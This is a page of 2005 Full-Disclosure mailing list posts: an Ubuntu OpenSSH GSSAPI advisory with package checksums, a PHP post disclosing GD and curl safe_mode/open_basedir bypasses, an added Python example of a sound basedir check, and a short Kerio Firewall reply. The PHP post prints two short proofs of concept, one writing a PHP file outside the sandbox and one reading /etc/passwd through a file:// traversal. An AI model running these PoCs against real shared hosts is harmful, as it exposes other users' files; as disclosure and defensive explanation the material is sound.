importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

pgpezWirBvgU6.pgp
Description: PGP signature

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-208-1] SSH server vulnerability
===========================================================
Ubuntu Security Notice USN-208-1           October 17, 2005
openssh vulnerability
CAN-2005-2798
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

openssh-server

The problem can be corrected by upgrading the affected package to
version 1:3.8.1p1-11ubuntu3.2 (for Ubuntu 4.10), or 1:3.9p1-1ubuntu2.1
(for Ubuntu 5.04). In general, a standard system upgrade is sufficient
to effect the necessary changes.

Details follow:

An information disclosure vulnerability has been found in the SSH
server. When the GSSAPIAuthentication option was enabled, the SSH
server could send GSSAPI credentials even to users who attempted to
log in with a method other than GSSAPI. This could inadvertently
expose these credentials to an untrusted user.

Please note that this does not affect the default configuration of the
SSH server.

Updated packages for Ubuntu 4.10:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.diff.gz
      Size/MD5:   145915 b3fde6ad57fa71c6fedd0d857a41b98d
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.dsc
      Size/MD5:      878 24b7a0d1b0bc1b12b4bfcdbe6523175f
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1.orig.tar.gz
      Size/MD5:   795948 9ce6f2fa5b2931ce2c4c25f3af9ad50d

  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_3.8.1p1-11ubuntu3.2_all.deb
      Size/MD5:    30068 9ef84fcec461c2890a1623499383b845

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb
      Size/MD5:   159440 464c3d1ddad5e743c3f87fab0801bd91
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_amd64.deb
      Size/MD5:   524028 51bda380ea97ef5d49d475b4d210fb6d
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb
Size/MD5: 176150 f0456146f631cb925407693de6c707ae http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_amd64.deb Size/MD5: 263790 a5014d5e2e28be860944fee7087c2d30 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_amd64.deb Size/MD5:53286 933c38274907edc3033e5728beb8a7f0 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_i386.udeb Size/MD5: 133700 91e3983782270ba83ead5fdf75cf6056 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_i386.deb Size/MD5: 473980 57c5dd711cb4bba5af54b377ddf25727 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_i386.udeb Size/MD5: 146854 94bae5597a13d613d1a7fe6d34e8312c http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_i386.deb Size/MD5: 241586 3761cc46ab91630196103390b86d36f4 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_i386.deb Size/MD5:52956 35adb2d5dafd2b25d0aaa73c87b8231c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb Size/MD5: 151096 34eaad307c336ec22cdd062ab8343918 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_powerpc.deb Size/MD5: 520822 be831a5152a07823c8a3642de79c23c3 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb Size/MD5: 160176 aae5f5a422bc2086c78581b05f6eb71b http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_powerpc.deb Size/MD5: 257946 0960bfb03e1682d28086d5b11bc55f51 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_powerpc.deb Size/MD5:54404 5729a05da0f88afe145a38ac80c92ae5 Updated packages for Ubuntu 
5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.diff.gz Size/MD5: 139063 63d2f62b292d2ac8baec90117878dbbd http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.dsc Size/MD5: 866 a4fce3d18d282f646942b15fb7a26915 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1.orig.tar.gz Size/MD5: 832804 530b1dcbfe7a4a4ce4959c0775b85a5a Architecture independent packages:
[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities
There is a vulnerability (Safedir Restriction Bypass) identified within the GD extension affecting the following functions:

- imagegif()
- imagepng()
- imagejpeg()

in /ext/gd/gd.c line 1647, which is now fixed in the cvs:
http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786

POC: with an image like http://81.57.125.106/~slythers/file.gif

    <?php
    $im = imagecreatefromgif("file.gif");
    imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
    ?>

curl openbasedir and safemode bypass.

POC:

    <?php
    mkdir("./" . $_SERVER["SCRIPT_NAME"] . "?");
    $ch = curl_init("file://" . $_SERVER["SCRIPT_FILENAME"] . "?/../../../../../../../../../../../etc/passwd");
    $file = curl_exec($ch);
    echo $file;
    ?>

As you notice, we can bypass the safedir, which leads to access to any files on any shared servers. This is fixed in the cvs.

[EMAIL PROTECTED]

greets: david coallier [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
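Two of the PHP items on this page are the same check failing in two ways: USN-207-1 above describes open_basedir being compared as a bare string prefix (so '/home/user1/' also admits /home/user10), and the curl PoC in this post hands a path containing "?/../../.." to a file:// open without collapsing the ".." segments first. The block below is an added example in Python, not PHP's own implementation and not the CVS fix the post links to: it shows the prefix-only comparison next to a directory-boundary check that normalises the path before comparing and accepts open_basedir's colon-separated list. Function names, the cwd parameter and the sample paths are this example's own. Symlink resolution (realpath on both sides, which the real check also needs) is left out so the check is deterministic offline.

```python
import posixpath


def allowed_prefix_only(basedir, path):
    """The broken comparison USN-207-1 describes: once the trailing slash is
    dropped, basedir is tested as a plain string prefix of the requested path,
    so '/home/user1/' matches /home/user10 as well."""
    return path.startswith(basedir.rstrip("/"))


def allowed_under_basedir(basedirs, path, cwd="/"):
    """Directory-boundary check.

    basedirs: open_basedir-style list, colon separated ("/home/user1/:/usr/share/php").
    path:     the path a filesystem function is about to open; relative paths are
              taken against cwd, then "." and ".." are collapsed lexically, which is
              the step the curl file:// PoC relies on the caller skipping.
    A path is allowed only if it equals an allowed directory or continues past it
    with a "/" separator, so a sibling that merely shares a prefix is rejected.
    """
    if not path.startswith("/"):
        path = posixpath.join(cwd, path)
    target = posixpath.normpath(path)
    for base in basedirs.split(":"):
        base = posixpath.normpath(base)
        if base == "/":
            return True                       # open_basedir of "/" restricts nothing
        if target == base or target.startswith(base + "/"):
            return True
    return False


def guarded_open(basedirs, path, mode="rb", cwd="/", opener=open):
    """Where the check belongs: in front of every function that touches the
    filesystem on the script's behalf (the gd.c writer and the curl file://
    handler in this post both skipped it). Raises PermissionError on a miss."""
    if not allowed_under_basedir(basedirs, path, cwd):
        raise PermissionError(f"open_basedir restriction in effect: {path}")
    return opener(path, mode)


if __name__ == "__main__":
    evil = "/home/user1/www/index.php?/../../../../../../../../../../../etc/passwd"
    for check in (allowed_prefix_only, allowed_under_basedir):
        print(check.__name__,
              check("/home/user1/", "/home/user10/secret"),
              check("/home/user1/", evil))
```

The lexical normalisation is necessary but not sufficient: a symlink inside the allowed tree still points wherever its owner wants, which is why PHP's check resolves both sides with realpath() before comparing, and even then the comparison happens before the open, so a directory that other users can write to under open_basedir remains a race window.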
Re: [Full-disclosure] Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local Denial of Service
On Thu, 13 Oct 2005, Piotr Bania wrote:

> Kerio Technologies Kerio Personal Firewall and Kerio Server Firewall
> FWDRV driver Local denial of service
> by Piotr Bania [EMAIL PROTECTED]

Part of the problem here is that KPF has reached end of life and will no longer be developed.

-- 
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/